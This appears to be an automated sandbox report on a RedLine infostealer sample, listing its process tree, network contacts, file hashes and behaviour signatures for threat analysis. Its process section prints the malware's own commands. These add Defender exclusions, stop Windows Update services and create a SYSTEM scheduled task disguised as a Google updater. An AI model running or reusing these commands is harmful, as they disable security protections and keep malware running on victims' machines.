Malware Analysis Report

2025-01-18 08:36

Sample ID 230810-r5ab7sfd9x
Target d6448d3082b315cf8dfa2dbbd9962b2c.exe
SHA256 5d6b4e79354059546f003225ed6a08bc4636d66876b714f24440f5568e5e7f81
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5d6b4e79354059546f003225ed6a08bc4636d66876b714f24440f5568e5e7f81

Threat Level: Known bad

The file d6448d3082b315cf8dfa2dbbd9962b2c.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Loads dropped DLL

Themida packer

Executes dropped EXE

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-10 14:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-10 14:46

Reported

2023-08-10 14:48

Platform

win7-20230712-en

Max time kernel

105s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2696 set thread context of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2188 set thread context of 1048 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 2188 set thread context of 1568 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 705de09d99cbd901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary blob omitted) C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary blob omitted) C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2208 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3020 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2696 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2052 wrote to memory of 2832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2888 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2052 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2744 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 2304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2744 wrote to memory of 1504 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2764 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2940 wrote to memory of 2188 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2936 wrote to memory of 1924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2936 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe

"C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {0A1773F5-AA0B-44BE-A47E-B87C8D40CCAC} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=57076 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6f99758,0x7fef6f99768,0x7fef6f99778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=836 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1216 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=57076 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1508 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1840 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1988 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2548 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2644 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2764 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 ogs.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.250.179.206:443 play.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 142.250.179.206:443 play.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.22:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabBB17.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarBC23.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 646bf18dcccebc495fda57a3e80ebddc
SHA1 ac316482ec55d932034c8cf57bb232cce942b501
SHA256 52531fcdcb4777717036e5bdd30f46d9efc7a4055e6df997b8db7a768069ef2e
SHA512 386e0856a2f147a9e5ad229e3fe6eadb475ae6d792fb0c7fc0ccfc7d9f8459701f837add8882051f13c341d626d0a5d05391bf3a20659c5a69d0067bae676369

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2208-158-0x0000000003640000-0x0000000004866000-memory.dmp

memory/2688-160-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-161-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2688-162-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-163-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-164-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-165-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-166-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-167-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-169-0x000000013FC90000-0x0000000140EB6000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2208-176-0x0000000003640000-0x0000000004866000-memory.dmp

memory/3020-177-0x000000000DC10000-0x000000000DE9B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2696-178-0x0000000000900000-0x0000000000B8B000-memory.dmp

memory/2688-179-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2696-180-0x0000000000900000-0x0000000000B8B000-memory.dmp

memory/1828-181-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1828-182-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1828-188-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1828-190-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1828-191-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1828-194-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-198-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-196-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-195-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-199-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-203-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-208-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-211-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-209-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-220-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-227-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-231-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-230-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-229-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-233-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-232-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-234-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-268-0x00000000779AF000-0x00000000779B0000-memory.dmp

memory/2608-276-0x000000001B230000-0x000000001B512000-memory.dmp

memory/2608-277-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2608-279-0x000000000272B000-0x0000000002792000-memory.dmp

memory/2608-281-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

memory/2608-282-0x0000000002724000-0x0000000002727000-memory.dmp

memory/2608-280-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

memory/2696-283-0x0000000000900000-0x0000000000B8B000-memory.dmp

